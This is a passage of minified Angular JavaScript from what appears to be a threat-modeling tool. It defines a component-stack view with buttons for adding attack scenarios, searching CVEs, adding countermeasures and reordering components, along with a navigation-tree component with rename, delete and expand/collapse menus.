"),m(24,"button",29),he("click",function(){be(e);const n=B().item;return Me(B().AddThreat(n))}),s(25,"\n          "),m(26,"mat-icon"),s(27,"flash_on"),u(),s(28,"\n          "),m(29,"span"),s(30),oe(31,"translate"),u(),s(32,"\n        "),u(),s(33,"\n        "),ne(34,mRe,9,3,"button",30),s(35,"\n        "),m(36,"button",29),he("click",function(){be(e);const n=B().item;return Me(B().AddCountermeasure(n))}),s(37,"\n          "),m(38,"mat-icon"),s(39,"security"),u(),s(40,"\n          "),m(41,"span"),s(42),oe(43,"translate"),u(),s(44,"\n        "),u(),s(45,"\n        "),m(46,"button",29),he("click",function(){be(e);const n=B().item;return Me(B().MoveLeft(n))}),s(47,"\n          "),m(48,"mat-icon"),s(49,"arrow_back"),u(),s(50,"\n          "),m(51,"span"),s(52),oe(53,"translate"),u(),s(54,"\n        "),u(),s(55,"\n        "),m(56,"button",29),he("click",function(){be(e);const n=B().item;return Me(B().MoveRight(n))}),s(57,"\n          "),m(58,"mat-icon"),s(59,"arrow_forward"),u(),s(60,"\n          "),m(61,"span"),s(62),oe(63,"translate"),u(),s(64,"\n        "),u(),s(65,"\n      "),Mt()}if(2&t){const e=B().item,i=B();C(2),V("ngIf",e),C(8),ke(re(11,8,"properties.openQuestionnaire")),C(10),ke(re(21,10,"pages.modeling.stack.deleteComponent")),C(10),ke(re(31,12,"pages.modeling.diagram.addAttackScenario")),C(4),V("ngIf",i.dataService.Project.HasTesting),C(8),ke(re(43,14,"pages.modeling.diagram.addCountermeasure")),C(10),ke(re(53,16,"pages.modeling.stack.moveLeft")),C(10),ke(re(63,18,"pages.modeling.stack.moveRight"))}}function hRe(t,a){if(1&t&&(s(0,"\n      "),ne(1,uRe,66,20,"ng-container",27),s(2,"\n    ")),2&t){const e=a.item;C(1),V("ngIf",e)}}let gT=(()=>{class t{constructor(e,i,n,r,c){this.theme=e,this.dataService=i,this.dialog=n,this.dialogService=r,this.elRef=c,this.menuTopLeftPosition={x:"0",y:"0"},this.selectionChanged=new Tt}get components(){var e;return null===(e=this.stack)||void 0===e?void 0:e.GetChildren()}ngOnInit(){}CompBadge(e){return e.IsActive&&!e.UserCheckedElement?"!":""}GetGroups(){return this.dataService.Config.GetMyComponentTypeGroups(this.stack.ComponentTypeID)}GetComponents(e){return this.components.filter(i=>e.Types.includes(i.Type))}OnComponentClick(e){this.selectedComponent=e,this.selectionChanged.emit(e)}OnComponentDblClick(e){e.IsActive=!0,this.selectedComponent=e;let i={components:this.components.filter(r=>r.IsActive),selectedComponent:this.selectedComponent};this.dialog.open(kG,{hasBackdrop:!0,data:i}).afterClosed().subscribe(r=>{this.selectedComponent=i.selectedComponent})}OnDrop(e,i){const n=JSON.parse(e.dataTransfer.getData("dragDropData"));let r;n.componentTypeID&&(r=this.dataService.Config.GetMyComponentType(n.componentTypeID)),r||(r=this.dataService.Config.CreateMyComponentType(i));const c=this.dataService.Project.CreateComponent(r);c.SyncNameToTypeName=!0,c.Name=r.Name,c.IsActive=!0,c.IsThirdParty=!1,this.stack.AddChild(c),this.OnComponentClick(c),setTimeout(()=>{document.dispatchEvent(new KeyboardEvent("keydown",{key:"F2"}))},250)}AllowDrop(e){e.preventDefault()}GetComponentColor(e){return e&&e==this.selectedComponent?this.theme.Primary:this.theme.IsDarkMode?"white":"black"}GetComponentPort(e){if(e.TypeID==zr.Software){const i=e.GetProperties().find(n=>n.Type==Ii.PortBox);if(i)return e.GetProperty(i.ID)}return null}AddThreat(e){if(e||(e=this.selectedComponent),e){let i=this.dataService.Project.CreateAttackScenario(this.stack.ID,!1);i.SetMapping("",[],e,[e],null,null,null,null),i.IsGenerated=!1,this.dialogService.OpenAttackScenarioDialog(i,!0).subscribe(n=>{n||this.dataService.Project.DeleteAttackScenario(i)})}}ShowCVESearch(){this.dialogService.OpenCveSearchDialog(this.selectedComponent,this.stack.ID)}AddTestCase(e){if(e||(e=this.selectedComponent),e){const i=this.dataService.Project.CreateTestCase();i.AddLinkedElement(e),this.dialogService.OpenTestCaseDialog(i,!0).subscribe(n=>{n||this.dataService.Project.DeleteTestCase(i)})}}AddCountermeasure(e){if(e||(e=this.selectedComponent),e){let i=this.dataService.Project.CreateCountermeasure(this.stack.ID,!1);i.SetMapping(null,[e],[]),this.dialogService.OpenCountermeasureDialog(i,!0,this.stack.GetChildrenFlat()).subscribe(n=>{n||this.dataService.Project.DeleteCountermeasure(i)})}}OnDeleteElement(e){this.dialogService.OpenDeleteObjectDialog(e).subscribe(i=>{i&&this.dataService.Project.DeleteComponent(e)})}MoveLeft(e){const i=this.GetGroups().find(T=>this.GetComponents(T).includes(e)),n=this.GetComponents(i),r=this.stack.GetChildren(),c=r.indexOf(e),d=r.indexOf(n[n.indexOf(e)-1]);if(c>0&&d>=0){const T=this.stack.Data.childrenIDs;T.splice(d,0,T.splice(c,1)[0])}}MoveRight(e){const i=this.GetGroups().find(T=>this.GetComponents(T).includes(e)),n=this.GetComponents(i),r=this.stack.GetChildren(),c=r.indexOf(e),d=r.indexOf(n[n.indexOf(e)+1]);if(c<r.length-1&&d>=0){const T=this.stack.Data.childrenIDs;T.splice(d,0,T.splice(c,1)[0])}}OpenContextMenu(e,i){e.preventDefault(),this.menuTopLeftPosition.x=e.clientX+"px",this.menuTopLeftPosition.y=e.clientY+"px",this.matMenuTrigger.menuData={item:i},this.matMenuTrigger.openMenu()}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(vu),Ee(Wn),Ee(mi))},t.\u0275cmp=Wt({type:t,selectors:[["app-stack"]],viewQuery:function(e,i){if(1&e&&Mi(po,5),2&e){let n;Vt(n=Bt())&&(i.matMenuTrigger=n.first)}},inputs:{stack:"stack",selectedComponent:"selectedComponent"},outputs:{selectionChanged:"selectionChanged"},decls:89,vars:56,consts:[[2,"width","100%","height","100%"],[1,"tools","mat-elevation-z8"],["mat-button","","matTooltipShowDelay","1000",1,"toolBtn",3,"disabled","matTooltip","click"],["xmlns","http://www.w3.org/2000/svg","width","25","height","25","version","1.1"],["x","1","y","1","width","23","height","23","rx","3","ry","3"],["x","2","y","16",1,"heavy"],["mat-button","","class","toolBtn","matTooltipShowDelay","1000",3,"disabled","matTooltip","click",4,"ngIf"],[2,"border-spacing","0 20px",3,"dragover"],[3,"drop",4,"ngFor","ngForOf"],[1,"group",2,"font-size","x-small"],[2,"display","flex","flex-wrap","wrap"],[2,"position","relative"],[1,"component","component-legend"],[1,"component","component-legend",2,"opacity","0.5"],[1,"component","component-legend","component-third-party"],[1,"component","component-legend",2,"border-style","dotted"],[2,"visibility","hidden","position","fixed",3,"matMenuTriggerFor"],["rightMenu","matMenu"],["matMenuContent",""],[3,"drop"],[1,"group"],["style","position: relative;",4,"ngFor","ngForOf"],["style","visibility: hidden;","class","component",4,"ngIf"],["matBadgeColor","primary","matBadgePosition","below",1,"component",3,"matBadge","matBadgeHidden","click","dblclick","contextmenu"],["class","component-base component-port",3,"component-dark",4,"ngIf"],[1,"component-base","component-port"],[1,"component",2,"visibility","hidden"],[4,"ngIf"],["style","margin-left: 20px; margin-right: 20px;",4,"ngIf"],["mat-menu-item","",3,"click"],["mat-menu-item","",3,"click",4,"ngIf"],[2,"margin-left","20px","margin-right","20px"]],template:function(e,i){if(1&e&&(m(0,"div",0),s(1,"\n  "),m(2,"div",1),s(3,"\n    "),m(4,"button",2),he("click",function(){return i.AddThreat(i.selectedComponent)}),oe(5,"translate"),s(6,"\n      "),m(7,"mat-icon"),s(8,"flash_on"),u(),s(9,"\n    "),u(),s(10,"\n    "),m(11,"button",2),he("click",function(){return i.ShowCVESearch()}),oe(12,"translate"),s(13,"\n      "),s(14,"\n      "),fi(),m(15,"svg",3),s(16,"\n        "),it(17,"rect",4),s(18,"\n        "),m(19,"text",5),s(20,"CVE"),u(),s(21,"\n      "),u(),s(22,"\n    "),u(),s(23,"\n    "),ne(24,oRe,6,4,"button",6),s(25,"\n    "),ln(),m(26,"button",2),he("click",function(){return i.AddCountermeasure(i.selectedComponent)}),oe(27,"translate"),s(28,"\n      "),m(29,"mat-icon"),s(30,"security"),u(),s(31,"\n    "),u(),s(32,"\n  "),u(),s(33,"\n  "),m(34,"table",7),he("dragover",function(r){return i.AllowDrop(r)}),s(35,"\n    "),m(36,"tbody"),s(37,"\n      "),ne(38,lRe,13,3,"tr",8),s(39,"\n      "),m(40,"tr"),s(41,"\n        "),m(42,"td")(43,"p",9),s(44),oe(45,"translate"),u()(),s(46,"\n        "),m(47,"td",10),s(48,"\n          "),m(49,"div",11),s(50,"\n            "),m(51,"button",12),s(52),oe(53,"translate"),u(),s(54,"\n          "),u(),s(55,"\n          "),m(56,"div",11),s(57,"\n            "),m(58,"button",13),s(59),oe(60,"translate"),u(),s(61,"\n          "),u(),s(62,"\n          "),m(63,"div",11),s(64,"\n            "),m(65,"button",14),s(66),oe(67,"translate"),u(),s(68,"\n          "),u(),s(69,"\n          "),m(70,"div",11),s(71,"\n            "),m(72,"button",15),s(73),oe(74,"translate"),u(),s(75,"\n          "),u(),s(76,"\n        "),u(),s(77,"\n      "),u(),s(78,"\n    "),u(),s(79,"\n  "),u(),s(80,"\n\n  "),it(81,"div",16),s(82," \n  "),m(83,"mat-menu",null,17),s(85," \n    "),ne(86,hRe,3,1,"ng-template",18),s(87," \n  "),u(),s(88," \n"),u()),2&e){const n=Ti(84);C(2),Ct("bg-color-light2",!i.theme.IsDarkMode)("bg-color-dark2",i.theme.IsDarkMode),C(2),at("matTooltip",re(5,40,"pages.modeling.diagram.addAttackScenario")),V("disabled",!i.selectedComponent),C(7),at("matTooltip",re(12,42,"pages.modeling.diagram.CveSearch")),V("disabled",!i.selectedComponent),C(6),Rt("fill",i.selectedComponent?i.theme.IsDarkMode?"#FFF":"#000":i.theme.IsDarkMode?"#676767":"#B6B6B6"),C(2),Rt("fill",i.theme.IsDarkMode?"#000":"#FFF"),C(5),V("ngIf",i.dataService.Project.HasTesting),C(2),at("matTooltip",re(27,44,"pages.modeling.diagram.addCountermeasure")),V("disabled",!i.selectedComponent),C(12),V("ngForOf",i.GetGroups()),C(6),ke(re(45,46,"pages.modeling.stack.legend")),C(7),ri("border-color",i.GetComponentColor(null)),Ct("component-dark",i.theme.IsDarkMode),C(1),ct("\n              ",re(53,48,"pages.modeling.stack.ActiveComponent"),"\n            "),C(6),ri("border-color",i.GetComponentColor(null)),Ct("component-dark",i.theme.IsDarkMode),C(1),ct("\n              ",re(60,50,"pages.modeling.stack.InactiveComponent"),"\n            "),C(6),ri("border-color",i.GetComponentColor(null)),Ct("component-dark",i.theme.IsDarkMode),C(1),ct("\n              ",re(67,52,"pages.modeling.stack.ThirdPartyComponent"),"\n            "),C(6),ri("border-color",i.GetComponentColor(null)),Ct("component-dark",i.theme.IsDarkMode),C(1),ct("\n              ",re(74,54,"pages.modeling.stack.OutOfScopeComponent"),"\n            "),C(8),ri("left",i.menuTopLeftPosition.x)("top",i.menuTopLeftPosition.y),V("matMenuTriggerFor",n)}},dependencies:[Zi,Ri,oa,Hh,da,Xo,qo,po,el,Pa,Xi],styles:['.column1[_ngcontent-%COMP%]{float:left;width:30px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 70px)}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.group[_ngcontent-%COMP%]{transform-origin:center;transform:rotate(-90deg);text-align:center;margin:0;font-weight:700;font-size:smaller;max-width:100px}.component-base[_ngcontent-%COMP%], .component[_ngcontent-%COMP%]{background:none;margin:5px;cursor:pointer;border-radius:5px}.component[_ngcontent-%COMP%]{font-size:large;height:75px;min-width:130px;border-radius:10px}.component-dark[_ngcontent-%COMP%]{border-color:#fff;color:#fff}.component-third-party[_ngcontent-%COMP%]{background-color:#ffffff1a}.component-port[_ngcontent-%COMP%]{position:absolute;left:4px;bottom:4px;border:2px solid;padding:0 2px}.component-legend[_ngcontent-%COMP%]{font-size:small;height:25px;min-width:60px;border-radius:5px}.tools[_ngcontent-%COMP%]{display:block;float:left;height:27px;width:100%}.toolBtn[_ngcontent-%COMP%]{width:30px;min-width:30px;padding:0;line-height:25px;margin-left:5px}.toolBtn-Selected[_ngcontent-%COMP%]{background-color:#ffffff26}',".heavy[_ngcontent-%COMP%] {\n          font: bold 10px sans-serif;\n        }"]}),t})(),xa=(()=>{class t{constructor(){this.Nodes=[],this.nodeTreeChanged=new Tt}get selectedNode(){return this._selectedNode}set selectedNode(e){this._selectedNode=e}FindNodeOfObject(e){return t.findNodeOfObjectRec(e,this.Nodes)}static TransferExpandedState(e,i){if(null==e||null==i)return;let n=t.FlattenNodes(e);t.FlattenNodes(i).forEach(c=>{if(null!=c.data){let d=n.find(T=>T.data==c.data);d&&null!=d.isExpanded&&(c.isExpanded=d.isExpanded)}else{let d=n.filter(T=>T.name()==c.name()&&null==T.data);1==(null==d?void 0:d.length)&&d[0]&&null!=d[0].isExpanded&&(c.isExpanded=d[0].isExpanded)}})}static FlattenNodes(e){let i=[],n=r=>{r.forEach(c=>{i.push(c),c.children&&n(c.children)})};return n(e),i}static FindNodeOfObject(e,i){return t.findNodeOfObjectRec(e,i)}static findNodeOfObjectRec(e,i){for(let n=0;n<i.length;n++){if(i[n].data==e)return i[n];if(i[n].children){let r=this.findNodeOfObjectRec(e,i[n].children);if(r)return r}}}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275cmp=Wt({type:t,selectors:[["ng-component"]],inputs:{selectedNode:"selectedNode"},outputs:{nodeTreeChanged:"nodeTreeChanged"},decls:0,vars:0,template:function(e,i){},encapsulation:2}),t})();const fRe=["ctxMenu"];function pRe(t,a){if(1&t){const e=Ye();m(0,"mat-checkbox",20),he("change",function(){be(e);const n=B().$implicit;return Me(B().OnNodeChecked(n))}),u()}if(2&t){const e=B().$implicit,i=B();V("disabled",!e.checkEnabled||!i.checkEnabled)("checked",e.isChecked)}}function _Re(t,a){if(1&t&&(m(0,"mat-icon",21),s(1),u()),2&t){const e=B().$implicit;C(1),ke(e.icon)}}function gRe(t,a){if(1&t&&(m(0,"span",22),s(1),u()),2&t){const e=B().$implicit;ri("opacity",e.isInactive&&e.isInactive()?.5:1),at("matTooltip",e.tooltip),C(1),ke(e.name())}}function CRe(t,a){if(1&t&&(m(0,"span",23),s(1),u()),2&t){const e=B().$implicit;ri("opacity",e.isInactive&&e.isInactive()?.5:1),at("matTooltip",e.tooltipExtension),C(1),ke(e.nameExtension)}}function yRe(t,a){if(1&t){const e=Ye();bt(0),m(1,"input",24),he("keydown",function(n){be(e);const r=B().$implicit;return Me(B().OnRename(n,r))})("focusout",function(n){be(e);const r=B().$implicit;return Me(B().OnRename(n,r))}),u(),Mt()}if(2&t){const e=B().$implicit,i=B();C(1),V("spellcheck",i.dataService.HasSpellCheck)("ngModel",e.name())}}function bRe(t,a){if(1&t){const e=Ye();m(0,"button",25),he("click",function(){be(e);const n=B().$implicit;return Me(B().OnEditName(n))}),oe(1,"translate"),m(2,"mat-icon"),s(3,"edit"),u()()}2&t&&at("matTooltip",re(1,1,"general.Rename"))}function MRe(t,a){if(1&t){const e=Ye();m(0,"button",25),he("click",function(){return be(e),Me(B().$implicit.onDuplicate())}),oe(1,"translate"),m(2,"mat-icon"),s(3,"content_copy"),u()()}2&t&&at("matTooltip",re(1,1,"general.Duplicate"))}function vRe(t,a){if(1&t){const e=Ye();m(0,"button",25),he("click",function(){return be(e),Me(B().$implicit.onDelete())}),oe(1,"translate"),m(2,"mat-icon"),s(3,"delete"),u()()}2&t&&at("matTooltip",re(1,1,"general.Delete"))}function ARe(t,a){if(1&t){const e=Ye();m(0,"button",25),he("click",function(){return be(e),Me(B().$implicit.onAdd())}),oe(1,"translate"),m(2,"mat-icon"),s(3,"add"),u()()}2&t&&at("matTooltip",re(1,1,"general.Add"))}function TRe(t,a){if(1&t&&(m(0,"button",26),oe(1,"translate"),m(2,"mat-icon"),s(3,"add"),u()()),2&t){B();const e=Ti(23);at("matTooltip",re(1,2,"general.Add")),V("matMenuTriggerFor",e)}}function ERe(t,a){if(1&t){const e=Ye();m(0,"button",27),he("click",function(){const r=be(e).$implicit;return Me(B().$implicit.onAdd(r))}),s(1),u()}if(2&t){const e=a.$implicit;C(1),ke(e)}}function DRe(t,a){if(1&t&&(m(0,"mat-icon",28),s(1),u()),2&t){const e=B().$implicit;C(1),ke(e.icon)}}function xRe(t,a){if(1&t){const e=Ye();m(0,"mat-tree-node",9),he("click",function(n){const c=be(e).$implicit;return Me(B().OnNodeClick(c,n))})("dblclick",function(){const r=be(e).$implicit;return Me(B().OnNodeDoubleClick(r))})("contextmenu",function(n){const c=be(e).$implicit;return Me(B().OpenContextMenu(n,c))}),s(1,"\n    "),ne(2,pRe,1,2,"mat-checkbox",10),s(3,"\n    "),ne(4,_Re,2,1,"mat-icon",11),s(5,"\n    "),ne(6,gRe,2,4,"span",12),s(7,"\n    "),ne(8,CRe,2,4,"span",13),s(9,"\n    "),ne(10,yRe,2,2,"ng-container",14),s(11,"\n    "),ne(12,bRe,4,3,"button",15),s(13,"\n    "),ne(14,MRe,4,3,"button",15),s(15,"\n    "),ne(16,vRe,4,3,"button",15),s(17,"\n    "),ne(18,ARe,4,3,"button",15),s(19,"\n    "),ne(20,TRe,4,4,"button",16),s(21,"\n    "),m(22,"mat-menu",null,17),s(24,"\n      "),ne(25,ERe,2,1,"button",18),s(26,"\n    "),u(),s(27,"\n    "),ne(28,DRe,2,1,"mat-icon",19),s(29,"\n  "),u()}if(2&t){const e=a.$implicit,i=B();ri("font-weight",e.isBold?"bold":"normal")("cursor",i.CanSelet(e)?"pointer":"auto"),Ct("highlight-light",i.activeNode===e&&!i.theme.IsDarkMode)("highlight-dark",i.activeNode===e&&i.theme.IsDarkMode),C(2),V("ngIf",e.canCheck),C(2),V("ngIf",e.iconAlignLeft&&e.icon),C(2),V("ngIf",!e.isRenaming),C(2),V("ngIf",e.nameExtension&&!e.isRenaming),C(2),V("ngIf",e.isRenaming),C(2),V("ngIf",e.canRename&&!e.isRenaming),C(2),V("ngIf",e.canDuplicate),C(2),V("ngIf",e.canDelete),C(2),V("ngIf",e.canAdd&&!e.addOptions),C(2),V("ngIf",e.canAdd&&e.addOptions),C(5),V("ngForOf",e.addOptions),C(3),V("ngIf",!e.iconAlignLeft&&e.icon)}}function wRe(t,a){if(1&t){const e=Ye();m(0,"mat-checkbox",20),he("change",function(){be(e);const n=B().$implicit;return Me(B().OnNodeChecked(n))}),u()}if(2&t){const e=B().$implicit,i=B();V("disabled",!e.checkEnabled||!i.checkEnabled)("checked",e.isChecked)}}function IRe(t,a){if(1&t&&(m(0,"mat-icon",21),s(1),u()),2&t){const e=B().$implicit;C(1),ke(e.icon)}}function RRe(t,a){if(1&t&&(m(0,"span",38),s(1),u()),2&t){const e=B().$implicit;ri("opacity",e.isInactive&&e.isInactive()?.5:1),at("matTooltip",e.tooltip),C(1),ke(e.name())}}function SRe(t,a){if(1&t&&(m(0,"span",23),s(1),u()),2&t){const e=B().$implicit;ri("opacity",e.isInactive&&e.isInactive()?.5:1),at("matTooltip",e.tooltipExtension),C(1),ke(e.nameExtension)}}function kRe(t,a){if(1&t){const e=Ye();bt(0),m(1,"input",24),he("keydown",function(n){be(e);const r=B().$implicit;return Me(B().OnRename(n,r))})("focusout",function(n){be(e);const r=B().$implicit;return Me(B().OnRename(n,r))}),u(),Mt()}if(2&t){const e=B().$implicit,i=B();C(1),V("spellcheck",i.dataService.HasSpellCheck)("ngModel",e.name())}}function PRe(t,a){if(1&t){const e=Ye();m(0,"button",25),he("click",function(){be(e);const n=B().$implicit;return Me(B().OnEditName(n))}),oe(1,"translate"),m(2,"mat-icon"),s(3,"edit"),u()()}2&t&&at("matTooltip",re(1,1,"general.Rename"))}function ORe(t,a){if(1&t){const e=Ye();m(0,"button",25),he("click",function(){return be(e),Me(B().$implicit.onDelete())}),oe(1,"translate"),m(2,"mat-icon"),s(3,"delete"),u()()}2&t&&at("matTooltip",re(1,1,"general.Delete"))}function NRe(t,a){if(1&t){const e=Ye();m(0,"button",25),he("click",function(){return be(e),Me(B().$implicit.onAdd())}),oe(1,"translate"),m(2,"mat-icon"),s(3,"add"),u()()}2&t&&at("matTooltip",re(1,1,"general.Add"))}function LRe(t,a){if(1&t&&(m(0,"button",26),oe(1,"translate"),m(2,"mat-icon"),s(3,"add"),u()()),2&t){B();const e=Ti(29);at("matTooltip",re(1,2,"general.Add")),V("matMenuTriggerFor",e)}}function zRe(t,a){if(1&t){const e=Ye();m(0,"button",27),he("click",function(){const r=be(e).$implicit;return Me(B().$implicit.onAdd(r))}),s(1),u()}if(2&t){const e=a.$implicit;C(1),ke(e)}}const WRe=function(t){return{item:t}};function FRe(t,a){if(1&t&&(m(0,"button",39),oe(1,"translate"),m(2,"mat-icon"),s(3,"more_vert"),u()()),2&t){const e=B().$implicit;B();const i=Ti(11);at("matTooltip",re(1,3,"general.More")),V("matMenuTriggerFor",i)("matMenuTriggerData",fr(5,WRe,e))}}function VRe(t,a){if(1&t&&(m(0,"mat-icon",40),s(1),u()),2&t){const e=B().$implicit;ri("margin-left",e.hasMenu?"0":"auto"),C(1),ke(e.icon)}}function BRe(t,a){if(1&t){const e=Ye();m(0,"mat-nested-tree-node",29),he("click",function(n){const c=be(e).$implicit;return Me(B().OnNodeClick(c,n))})("dblclick",function(){const r=be(e).$implicit;return Me(B().OnNodeDoubleClick(r))})("contextmenu",function(n){const c=be(e).$implicit;return Me(B().OpenContextMenu(n,c))}),s(1,"\n    "),m(2,"div",30),s(3,"\n      "),m(4,"button",31),he("click",function(){const r=be(e).$implicit;return Me(r.isExpanded=!r.isExpanded)}),s(5,"\n        "),m(6,"mat-icon",32),s(7),u(),s(8,"\n      "),u(),s(9,"\n      "),ne(10,wRe,1,2,"mat-checkbox",10),s(11,"\n      "),ne(12,IRe,2,1,"mat-icon",11),s(13,"\n      "),ne(14,RRe,2,4,"span",33),s(15,"\n      "),ne(16,SRe,2,4,"span",13),s(17,"\n      "),ne(18,kRe,2,2,"ng-container",14),s(19,"\n      "),ne(20,PRe,4,3,"button",15),s(21,"\n      "),ne(22,ORe,4,3,"button",15),s(23,"\n      "),ne(24,NRe,4,3,"button",15),s(25,"\n      "),ne(26,LRe,4,4,"button",16),s(27,"\n      "),m(28,"mat-menu",null,17),s(30,"\n        "),ne(31,zRe,2,1,"button",18),s(32,"\n      "),u(),s(33,"\n      "),ne(34,FRe,4,7,"button",34),s(35,"\n      "),ne(36,VRe,2,3,"mat-icon",35),s(37,"\n    "),u(),s(38,"\n    "),s(39,"\n    "),m(40,"div",36),s(41,"\n      "),Ir(42,37),s(43,"\n    "),u(),s(44,"\n  "),u()}if(2&t){const e=a.$implicit,i=B();ri("cursor",i.CanSelet(e)?"pointer":"auto"),C(2),Ct("highlight-light",i.activeNode===e&&!i.theme.IsDarkMode)("highlight-dark",i.activeNode===e&&i.theme.IsDarkMode),C(5),ct("\n          ",i.treeControl.isExpanded(e)?"expand_more":"chevron_right","\n        "),C(3),V("ngIf",e.canCheck),C(2),V("ngIf",e.iconAlignLeft&&e.icon),C(2),V("ngIf",!e.isRenaming),C(2),V("ngIf",e.nameExtension&&!e.isRenaming),C(2),V("ngIf",e.isRenaming),C(2),V("ngIf",e.canRename&&!e.isRenaming),C(2),V("ngIf",e.canDelete),C(2),V("ngIf",e.canAdd&&!e.addOptions),C(2),V("ngIf",e.canAdd&&e.addOptions),C(5),V("ngForOf",e.addOptions),C(3),V("ngIf",e.hasMenu),C(2),V("ngIf",!e.iconAlignLeft&&e.icon),C(4),Ct("nav-tree-invisible",!i.treeControl.isExpanded(e))}}function HRe(t,a){if(1&t){const e=Ye();s(0,"\n        "),m(1,"button",27),he("click",function(){be(e);const n=B().item;return Me(B().OnCollapse(n,0))}),s(2,"\n          "),m(3,"span"),s(4),oe(5,"translate"),u(),s(6,"\n        "),u(),s(7,"\n        "),m(8,"button",27),he("click",function(){be(e);const n=B().item;return Me(B().OnCollapse(n,1))}),s(9,"\n          "),m(10,"span"),s(11),oe(12,"translate"),u(),s(13,"\n        "),u(),s(14,"\n        "),m(15,"button",27),he("click",function(){be(e);const n=B().item;return Me(B().OnCollapse(n,2))}),s(16,"\n          "),m(17,"span"),s(18),oe(19,"translate"),u(),s(20,"\n        "),u(),s(21,"\n      ")}2&t&&(C(4),ke(re(5,3,"nav-tree.level0")),C(7),ke(re(12,5,"nav-tree.level1")),C(7),ke(re(19,7,"nav-tree.level2")))}function URe(t,a){if(1&t){const e=Ye();s(0,"\n        "),m(1,"button",27),he("click",function(){be(e);const n=B().item;return Me(B().OnExpand(n,0))}),s(2,"\n          "),m(3,"span"),s(4),oe(5,"translate"),u(),s(6,"\n        "),u(),s(7,"\n        "),m(8,"button",27),he("click",function(){be(e);const n=B().item;return Me(B().OnExpand(n,1))}),s(9,"\n          "),m(10,"span"),s(11),oe(12,"translate"),u(),s(13,"\n        "),u(),s(14,"\n        "),m(15,"button",27),he("click",function(){be(e);const n=B().item;return Me(B().OnExpand(n,2))}),s(16,"\n          "),m(17,"span"),s(18),oe(19,"translate"),u(),s(20,"\n        "),u(),s(21,"\n      ")}2&t&&(C(4),ke(re(5,3,"nav-tree.level0")),C(7),ke(re(12,5,"nav-tree.level1")),C(7),ke(re(19,7,"nav-tree.level2")))}function qRe(t,a){if(1&t&&(s(0,"\n    "),m(1,"button",41),s(2,"\n      "),m(3,"mat-icon"),s(4,"chevron_right"),u(),s(5,"\n      "),m(6,"span"),s(7),oe(8,"translate"),u(),s(9,"\n    "),u(),s(10,"\n    "),m(11,"mat-menu",null,42),s(13,"\n      "),ne(14,HRe,22,9,"ng-template",4),s(15," \n    "),u(),s(16,"\n    "),m(17,"button",41),s(18,"\n      "),m(19,"mat-icon"),s(20,"expand_more"),u(),s(21,"\n      "),m(22,"span"),s(23),oe(24,"translate"),u(),s(25,"\n    "),u(),s(26,"\n    "),m(27,"mat-menu",null,43),s(29,"\n      "),ne(30,URe,22,9,"ng-template",4),s(31," \n    "),u(),s(32,"\n  ")),2&t){const e=Ti(12),i=Ti(28);C(1),V("matMenuTriggerFor",e),C(6),ke(re(8,4,"nav-tree.collapse")),C(10),V("matMenuTriggerFor",i),C(6),ke(re(24,6,"nav-tree.expand"))}}function GRe(t,a){if(1&t&&(m(0,"span",47),s(1),u()),2&t){const e=B().item;C(1),ke(e.name())}}const jRe=function(t,a){return{groups:t,item:a}};function QRe(t,a){if(1&t){const e=Ye();s(0,"\n    "),ne(1,GRe,2,1,"span",44),s(2," \n    "),m(3,"button",45),he("click",function(){const r=be(e).item;return Me(B().OnMoveUp(r))}),s(4,"\n      "),m(5,"mat-icon"),s(6,"arrow_upward"),u(),s(7,"\n      "),m(8,"span"),s(9),oe(10,"translate"),u(),s(11,"\n    "),u(),s(12,"\n    "),m(13,"button",45),he("click",function(){const r=be(e).item;return Me(B().OnMoveDown(r))}),s(14,"\n      "),m(15,"mat-icon"),s(16,"arrow_downward"),u(),s(17,"\n      "),m(18,"span"),s(19),oe(20,"translate"),u(),s(21,"\n    "),u(),s(22,"\n    "),m(23,"button",46),s(24,"\n      "),m(25,"mat-icon"),s(26,"low_priority"),u(),s(27,"\n      "),m(28,"span"),s(29),oe(30,"translate"),u(),s(31,"\n    "),u(),s(32,"\n  ")}if(2&t){const e=a.item;B();const i=Ti(26);C(1),V("ngIf",e),C(2),V("disabled",!e.canMoveUpDown),C(6),ke(re(10,9,"nav-tree.moveUp")),C(4),V("disabled",!e.canMoveUpDown),C(6),ke(re(20,11,"nav-tree.moveDown")),C(4),V("disabled",!e.canMoveToGroup)("matMenuTriggerFor",i)("matMenuTriggerData",Ah(15,jRe,e.onMoveToGroups?e.onMoveToGroups():null,e)),C(6),ke(re(30,13,"nav-tree.moveToGroup"))}}function $Re(t,a){if(1&t){const e=Ye();m(0,"button",27),he("click",function(){const r=be(e).$implicit,c=B().item;return Me(B().OnMoveToGroup(c,r))}),s(1),u()}if(2&t){const e=a.$implicit;C(1),ke(e.name())}}function KRe(t,a){if(1&t&&(s(0,"\n    "),ne(1,$Re,2,1,"button",18),s(2,"\n  ")),2&t){const e=a.groups;C(1),V("ngForOf",e)}}let df=(()=>{class t{constructor(e,i){this.theme=e,this.dataService=i,this.treeControl=new Rz(n=>n.children),this.dataSource=new HW,this.checkEnabled=!0,this.canCheckMultiple=!0,this.selectedNodeChanged=new Tt,this.checkedNodesChanged=new Tt,this.nodeDoubleClicked=new Tt,this.menuTopLeftPosition={x:"0",y:"0"},this.HasChild=(n,r)=>!!r.children&&r.children.length>0}get activeNode(){return this._activeNode}set activeNode(e){this._activeNode=e,this.selectedNodeChanged.emit(e),setTimeout(()=>{var i;null===(i=document.getElementById("renameBox"))||void 0===i||i.focus()},100)}set checkedNodes(e){xa.FlattenNodes(this.dataSource.data).forEach(n=>{n.isChecked=null==e?void 0:e.some(r=>r.data==n.data)})}ngOnInit(){}OpenContextMenu(e,i){e.preventDefault(),this.menuTopLeftPosition.x=e.clientX+"px",this.menuTopLeftPosition.y=e.clientY+"px",this.matMenuTrigger.menuData={item:i},this.matMenuTrigger.openMenu()}OnMoveUp(e){e.onMoveUp(),this.resetDataSource()}OnMoveDown(e){e.onMoveDown(),this.resetDataSource()}OnMoveToGroup(e,i){e.onMoveToGroup(i)}OnCollapse(e,i){var n,r,c,d;1==i?null===(n=e.children)||void 0===n||n.forEach(T=>this.treeControl.collapse(T)):2==i?null===(r=e.children)||void 0===r||r.forEach(T=>{var k;return null===(k=T.children)||void 0===k?void 0:k.forEach(q=>this.treeControl.collapse(q))}):0==i&&(this.dataSource.data.includes(e)?this.dataSource.data.forEach(T=>this.treeControl.collapse(T)):null===(d=null===(c=xa.FlattenNodes(this.dataSource.data).find(T=>{var k;return 